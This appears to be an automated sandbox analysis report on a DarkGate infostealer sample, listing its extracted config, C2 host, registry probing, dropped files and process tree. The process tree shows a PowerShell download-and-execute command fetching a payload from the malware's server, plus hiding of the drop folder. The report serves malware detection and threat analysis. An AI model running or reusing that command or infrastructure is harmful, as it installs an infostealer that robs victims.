darkgate | 280b45fb30ca137e582f5147af08ff310034aa9b368299e76c180b65ad81b93c

Analysis

max time kernel
1199s
max time network
1205s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
27-03-2024 21:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

report-(721490)-2024.html
Size

3KB
MD5

d6207a7c2d321188c004d77baacabba7
SHA1

0772674e0b4ed9a45d617e9c84dde1f76dfb9375
SHA256

280b45fb30ca137e582f5147af08ff310034aa9b368299e76c180b65ad81b93c
SHA512

080c587158ff0fe2bc687e31b1d613ca7dd38338ec82db40a0004ca2415993cf01eff548e0fdef53bb6c253ad2284e6f208df6c9987eafce60d0233925e02c6b

Score

10^/10

darkgate admin888 stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

withupdate.com

Attributes

anti_analysis
true
anti_debug
false
anti_vm
true
c2_port
80
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_raw_stub
false
internal_mutex
VqunyHFY
minimum_disk
50
minimum_ram
4000
ping_interval
6
rootkit
false
startup_persistence
true
username
admin888

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Detect DarkGate stealer 4 IoCs

resource	yara_rule
behavioral2/memory/1868-35-0x0000000004B60000-0x0000000004BD3000-memory.dmp	family_darkgate_v6
behavioral2/memory/1868-37-0x0000000004B60000-0x0000000004BD3000-memory.dmp	family_darkgate_v6
behavioral2/memory/4180-72-0x0000000004680000-0x00000000046F3000-memory.dmp	family_darkgate_v6
behavioral2/memory/4180-75-0x0000000004680000-0x00000000046F3000-memory.dmp	family_darkgate_v6

Blocklisted process makes network request 8 IoCs

flow	pid	Process
93	3688	powershell.exe
94	3688	powershell.exe
100	3688	powershell.exe
101	3688	powershell.exe
121	1832	powershell.exe
122	1832	powershell.exe
123	1832	powershell.exe
124	1832	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 2 IoCs

pid	Process
1868	AutoHotkey.exe
4180	AutoHotkey.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\ml\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\lo\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\en_US\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\ja\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\id\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\ta\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\manifest.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\en_CA\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\fi\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\hi\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\cy\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\it\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\kn\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\af\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\kk\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\en_GB\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\lv\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\pt_PT\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\be\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\ur\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\hu\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\az\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\sv\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\km\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\pl\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\te\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\si\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\no\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\eu\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\iw\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\zu\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\128.png	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\ar\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\pa\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\ne\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\dasherSettingSchema.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_metadata\verified_contents.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\mr\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\fil\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\hr\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\zh_HK\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\sr\messages.json	msedge.exe
File created	C:\Program Files\msedge_url_fetcher_3128_1162437747\GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_75_4_0.crx	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\page_embed_script.js	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\sk\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\ru\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\ro\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\bn\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\cs\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\eventpage_bin_prod.js	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\ko\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\gu\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\en\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\es_419\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\lt\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\et\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\th\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\my\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\ka\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\fa\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\nl\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\el\messages.json	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\manifest.fingerprint	msedge.exe
File created	C:\Program Files\chrome_Unpacker_BeginUnzipping3128_1663860876\_locales\ms\messages.json	msedge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{FA75796F-FFAD-4901-86F8-6D8F5277D120}	msedge.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
3688	powershell.exe
3688	powershell.exe
3688	powershell.exe
1832	powershell.exe
1832	powershell.exe
3128	msedge.exe
3128	msedge.exe
2900	msedge.exe
2900	msedge.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3688	powershell.exe
Token: SeDebugPrivilege	1832	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3916 wrote to memory of 3688	3916	WScript.exe	112
PID 3916 wrote to memory of 3688	3916	WScript.exe	112
PID 3688 wrote to memory of 1868	3688	powershell.exe	114
PID 3688 wrote to memory of 1868	3688	powershell.exe	114
PID 3688 wrote to memory of 1868	3688	powershell.exe	114
PID 3688 wrote to memory of 2156	3688	powershell.exe	115
PID 3688 wrote to memory of 2156	3688	powershell.exe	115
PID 3968 wrote to memory of 1832	3968	WScript.exe	118
PID 3968 wrote to memory of 1832	3968	WScript.exe	118
PID 1832 wrote to memory of 4180	1832	powershell.exe	120
PID 1832 wrote to memory of 4180	1832	powershell.exe	120
PID 1832 wrote to memory of 4180	1832	powershell.exe	120
PID 1832 wrote to memory of 4772	1832	powershell.exe	121
PID 1832 wrote to memory of 4772	1832	powershell.exe	121
PID 3128 wrote to memory of 2724	3128	msedge.exe	130
PID 3128 wrote to memory of 2724	3128	msedge.exe	130
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131
PID 3128 wrote to memory of 2988	3128	msedge.exe	131

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2156	attrib.exe
4772	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\report-(721490)-2024.html
1⤵
PID:1460

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=5788 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:1
1⤵
PID:3664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5848 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:1
1⤵
PID:3116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5996 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
1⤵
PID:3656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5376 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:1
1⤵
PID:2696

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=3144 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:1
1⤵
PID:3332

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=6216 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
1⤵
PID:3312

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\BHC2O5WS\Report-26-2024[1].vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'withupdate.com/zuyagaoq')
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3688
- - C:\rjtu\AutoHotkey.exe
    "C:\rjtu\AutoHotkey.exe" C:/rjtu/script.ahk
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    PID:1868
- - C:\Windows\system32\attrib.exe
    "C:\Windows\system32\attrib.exe" +h C:/rjtu/
    3⤵
    - Views/modifies file attributes
    PID:2156

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\O8VM10HV\Report-26-2024[2].vbs"
1⤵
PID:2492

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\O8VM10HV\Report-26-2024[1].vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'withupdate.com/zuyagaoq')
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1832
- - C:\rjtu\AutoHotkey.exe
    "C:\rjtu\AutoHotkey.exe" C:/rjtu/script.ahk
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    PID:4180
- - C:\Windows\system32\attrib.exe
    "C:\Windows\system32\attrib.exe" +h C:/rjtu/
    3⤵
    - Views/modifies file attributes
    PID:4772

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
1⤵
PID:4288

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1264 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:8
1⤵
PID:2216

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
- Drops file in Program Files directory
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x240,0x244,0x248,0x23c,0x250,0x7ffea3b92e98,0x7ffea3b92ea4,0x7ffea3b92eb0
  2⤵
  PID:2724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2208 --field-trial-handle=2212,i,4674988072723066624,2597363829971231730,262144 --variations-seed-version /prefetch:2
  2⤵
  PID:2988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3252 --field-trial-handle=2212,i,4674988072723066624,2597363829971231730,262144 --variations-seed-version /prefetch:3
  2⤵
  PID:4436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3508 --field-trial-handle=2212,i,4674988072723066624,2597363829971231730,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:112
- C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4416 --field-trial-handle=2212,i,4674988072723066624,2597363829971231730,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:2108
- C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4416 --field-trial-handle=2212,i,4674988072723066624,2597363829971231730,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4520 --field-trial-handle=2212,i,4674988072723066624,2597363829971231730,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:2788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4544 --field-trial-handle=2212,i,4674988072723066624,2597363829971231730,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:4788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4464 --field-trial-handle=2212,i,4674988072723066624,2597363829971231730,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:2636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4460 --field-trial-handle=2212,i,4674988072723066624,2597363829971231730,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:1012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4008 --field-trial-handle=2212,i,4674988072723066624,2597363829971231730,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:2136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=760 --field-trial-handle=2212,i,4674988072723066624,2597363829971231730,262144 --variations-seed-version /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3796 --field-trial-handle=2212,i,4674988072723066624,2597363829971231730,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:2064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4784 --field-trial-handle=2212,i,4674988072723066624,2597363829971231730,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:1612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56c43715e0e7fa58012d8a5769d8d568

SHA1
4370ca3436f2e3a95b47a728503a2c22a5a5fa39

SHA256
8ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5

SHA512
b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
e8d09133738657f5aab21c78a2f80bee

SHA1
e581429c58e93edd6bf791fff5b1cffd967f4934

SHA256
4be57044059ce4af593d920b168656bff929ebef8cde4cb03f037ec485f745e8

SHA512
